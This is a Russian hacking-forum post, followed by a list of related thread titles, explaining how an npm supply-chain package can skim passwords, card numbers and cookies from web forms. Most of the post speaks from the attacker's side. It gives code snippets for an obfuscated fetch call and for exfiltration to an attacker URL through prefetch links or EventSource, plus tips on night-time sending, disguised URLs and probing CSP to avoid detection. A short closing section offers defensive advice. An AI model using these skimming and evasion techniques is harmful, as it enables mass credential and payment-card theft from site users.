Интересно Как могут украсть ваши «учётки» через npm-пакет

Uno-uno

Original poster
Member
Сообщения
126
Реакции
101
Посетить сайт
1-32.jpg




Кража паролей лишит вас доступа к своей странице или может оставить без кругленькой суммы – вот оно, счастье злоумышленника.

Рассмотрим один интересный способ, как кража паролей может быть успешно реализована.
Заполучить пароль или номер кредитной карты можно многими способами. Далее речь пойдет о том, как это делается при помощи внедрения кода в npm-пакет. Вредоносный код, который и выполняет всю грязную работу, занимается поиском на странице браузера чего-либо из представленного ниже:

любая форма для ввода;

Элемент со свойством, в названии которого встречается «password», «cardnumber», «cvc», «checkout» и т. д.

Если после события submit искомая информация найдена, на этой страничке есть чем поживиться.

Из каждого поля формы извлекаем информацию (document.forms.forEach(…) );

собираем «печеньки»: document.cookie;

все это дело оборачивается всегда в рандомную строку: const payload = btoa(JSON.stringify(sensitiveUserData));

а после, отправляется на промежуточный хост:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



и в случае наличия полезностей – отправляется на сервер хакера.

Перевернем мир
Чтобы это счастье вышло в свет, нужно как-то заставить код попасть на потенциальные сайты-доноры. Можно пытаться пробиться через расширения браузеров, но это не так эффективно. Межсайтовый скриптинг – хороший вариант, но у него (у XSS) есть свои протоколы безопасности, и снова не те масштабы. Гораздо лучше подойдет npm.

Можно изобрести пакет, который будет на лету менять цвет консольного вывода в браузере.
Заставляем принять этот “полезный” апдейт в свои зависимости, при помощи пулл-реквеста для нескольких (любых) существующих пакетов в сети, и ждать.

Через месяц имеем 120000 скачиваний этого обновления и выполнение кода на более чем 1000 сайтов. Конечно же, это не панацея, и велика вероятность, что эфемерное обновление пакета не примут с распростертыми объятиями, но это безопасно, и есть шанс, что быстро не засекут.
Звучит все гладко и красиво, но есть некоторые вопросы, которые могут появиться у пытливого читателя, и их нужно развенчать.

Сетевые запросы от скрипта – код почти ничего не отправляет, т. е. постоянного обмена трафиком нет. Отсылка собранного материала происходит с 19:00 до 7:00, когда безопасники и прочие тестеры уже ничего не тестируют. Даже если тестировщик и захочет отличиться, код подменяет URL на “левый”, схожий с социальными сетями, и отправка происходит всегда в разное время: вот такой эффект неожиданности.

Поиск “странностей” в npm. Удачи! Временные и ресурсные затраты несопоставимы, ну а если и найдется что-то, то в коде нет и намека на fetch, XMLHttpRequest или адрес хоста, на который все отправляется.

Код:

Код:
const i = ‘gfudi‘;
const k = s => s.split(‘‘).map(c => String.fromCharCode(c.charCodeAt() - 1)).join(‘‘)
self[k(i)](urlWithYourPreciousData);

«gfudi» – это fetch, но с переставленными буквами на одну, а self – это алиас window. Не используется ничего обычного, как fetch. Вместо этого, везде где можно, нужно применять EventSource(urlВашихЛюбимыхДанных). Даже если трафик буду слушать по serviceWorker-у, никто ничего не заподозрит т. к. ничего не отправляется в браузерах, которые поддерживают serviceWorker.

Использование CSP в качестве защиты. С точки зрения CSP наш код ничего запрещенного не делает, кроме отправки данных на какой-то домен. Да, CSP неплохо справляется с XSS-атаками и может ограничивать общение браузера с внешним миром, но действия скрипта не настолько масштабны, чтобы можно было что-то проанализировать.

Код:

Код:
const linkEl = document.createElement(‘link‘);
linkEl.rel = ‘prefetch‘;
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);

Чтобы не поплатиться за взлом, нужно проверять CSP на наличие функционирующей системы блокировки (connect-src) и инструмент-перехватчик (default-src). Сделать это можно так:

Код:

Код:
fetch(document.location.href)
.then(resp => {
const csp = resp.headers.get(‘Content-Security-Policy‘);

// Смотрим, как работает CSP });

Проверять нужно в первый раз, чтобы пользователь, и прочие надзиратели ничего не заподозрили.

Куда теперь бежать?

Теперь подумаем от лица пользователя или разработчика: “Все плохо, наши пароли уже в даркнете!”. Чтобы попытаться избежать провала, нельзя использовать npm на страницах с формами, и прочими собирающими компонентами.

Нельзя использовать стороннюю рекламу, Google Tag Manager, скрипты с диаграммами, аналитику – никакого постороннего кода быть не должно, иначе можно получить инъекцию. Это касается только страниц, где пользователь что-то вводит, остальная же часть сайта может спокойно работать на React-е и не беспокоиться.

Вам нужна отдельная страница, которая не имеет ничего лишнего и уже в ней собирать номера кредиток, пароли и учетные данные в iFrame.

Кража паролей осуществляется и при помощи фишинга (подделывание настоящего сайта инфицированной копией). Если хакер сможет завладеть вашим почтовым ящиком, то плакали все регистрации и банковские счета, которые были привязаны к этой почте. За 2017 год было взломано 12 млн. учетных записей.

Вполне успешным является и кейлогерство – 1 млн. пользователей пострадал, именно из-за этого вредоноса.

Заключение
Никому нельзя доверять, и оставлять сайт с известными уязвимостями строго запрещено, т. к. в мире огромное количество желающих полакомиться чем-то ценным. Любой сайт уязвим, и список этих брешей постоянно меняется: не забывайте держать руку на пульсе.
 
Название темы
Автор Заголовок Раздел Ответы Дата
E Как с вашей карты могут легко украсть деньги Уязвимости и взлом 2
H Закрыто Кратко о том как вас могут найти Корзина 0
G Кратко о том как вас могут найти. Полезные статьи 4
C Как вас могут вычислить даже при условии использования Tor Browser. Анонимность и приватность 0
Support81 "Чудо-решение" или маркетинг: как Google создает иллюзию объективности для продвижения технологий Новости в сети 0
Support81 Фрод в рекламе: как мошенники крадут бюджеты и что с этим делать Новости в сети 0
Support81 Невидимый взломщик: как обычные разговоры позволяют взломать GPT-4o Новости в сети 0
Support81 5 лет до точки невозврата: как квантовые компьютеры обрушат мировые банки Новости в сети 0
Support81 Вирус в заявке: как Zhong Stealer «ломает» компании через службу поддержки Новости в сети 0
Support81 Обмани себя сам: как ИИ-трейдеры ведут подписчиков к финансовому краху Новости в сети 0
Support81 Взлом, майнинг, выкуп: 5 хакеров придумали, как выжать из IT-гигантов все соки Новости в сети 0
Support81 CAPTCHA + PDF: как мошенники превратили Webflow в орудие фишинга Новости в сети 0
Support81 $16 млн и 1000 жертв: как хакеры Phobos попались в ловушку спецслужб Новости в сети 0
Support81 Мечта хакеров: как CVE-2024-52875 стала идеальным инструментом для кибератак Новости в сети 0
Support81 StarkRDP теперь LakeVPS: как злоумышленники возрождают подпольные рынки за считанные дни Новости в сети 0
Support81 Дешевле – не значит лучше: как уязвимости DeepSeek уничтожают защиту бизнеса Новости в сети 1
Support81 Важно!!! MMS возвращается: как устаревший протокол стал оружием криптомошенников Новости в сети 0
Support81 Chrome, Firefox и Edge: как Flesh Stealer стал ночным кошмаром для браузеров Новости в сети 0
Support81 Майнеры в облаке: как хакеры годами добывают криптовалюту за чужой счёт Новости в сети 0
Ёшкин_кот Статья Как скрыть цифровой след в интернете: практическое руководство. Полезные статьи 0
Support81 Из одной банды ‒ сотня новых: как полицейские облавы укрепили армию шантажистов Новости в сети 0
Support81 Машина против машины: как MintsLoader избегает обнаружения Новости в сети 0
wrangler65 Интересно Как удалить информацию о себе из интернета: подробная инструкция Полезные статьи 0
Support81 Банки, логистика и мошенники: как работает фишинговая «Premium Panel» Новости в сети 0
Support81 Тайны кода: как спецслужбы США используют ошибки в ПО Новости в сети 0
Support81 GhostGPT: как Telegram-бот из новичков делает профи криминального ИИ Новости в сети 1
Support81 UI-TARS: ByteDance научила ИИ работать с компьютером как человек Новости в сети 0
Support81 Скамеры дуреют с этой прикормки: как секретный токен ФБР вывел мошенников на чистую воду Новости в сети 0
Support81 12 недель на решение: как Великобритания планирует побороть кибервымогательство Новости в сети 0
wrangler65 Интересно Как сэкономить до 70% на переводах USDT TRC-20 через энергию Полезные статьи 0
Support81 $787 тысяч исчезли за секунды: как хакеры обошли защиту Orange Finance Новости в сети 0
Support81 LockBit 4.0: как вымогатели планируют возвращать утраченные позиции Новости в сети 0
Support81 Личное в публичное: как простой вызов такси оборачивается потерей данных Новости в сети 0
Support81 Жертвы жадности: как работает новая схема кражи криптовалют на YouTube Новости в сети 0
Support81 Лица на распродаже: как утечки данных помогают хакерам обходить проверки личности Новости в сети 0
Support81 Генеративный ИИ на службе зла: как тысячи вирусов избегают обнаружения Новости в сети 0
Support81 DoS, RCE и утечки данных: как Prometheus становится оружием хакеров Новости в сети 0
Support81 $88 миллионов добычи: как IT-воины КНДР шесть лет водили США за нос Новости в сети 0
Support81 BadRAM: как взломать облака Amazon, Google и Microsoft за $10 Новости в сети 0
Support81 $16 миллионов похищено через LinkedIn: как хакеры обманули Rain Новости в сети 0
Support81 Rockstar 2FA: как хакеры обходят многофакторную защиту в два клика Новости в сети 0
Support81 Эксплойт дня: как баг в кsthunk.sys превращается в цифровое оружие Новости в сети 0
Support81 DDoS на заказ: как Matrix монетизирует крупнейшую ботнет-сеть через Telegram Новости в сети 0
Support81 12 месяцев в тени: как Salt Typhoon разоблачил агентурную сеть США Новости в сети 0
Support81 Ошибка в Windows Registry: как получить права администратора домена Новости в сети 0
Support81 План Си Цзиньпина: как превратить хакеров в государственный актив Новости в сети 0
Support81 Смартфон-стукач: как спецслужбы США использовали лазейку в законе для шпионажа Новости в сети 0
Support81 Самолюбие ценой в 15 лет: как геймер сливал гостайны США в Discord Новости в сети 0
Support81 Хакеры требуют $15 000 000: как 1win борется за сохранность данных 100 млн клиентов? Новости в сети 0
Support81 От Git до черного рынка: как заработать миллион на слабой защите Новости в сети 0

Название темы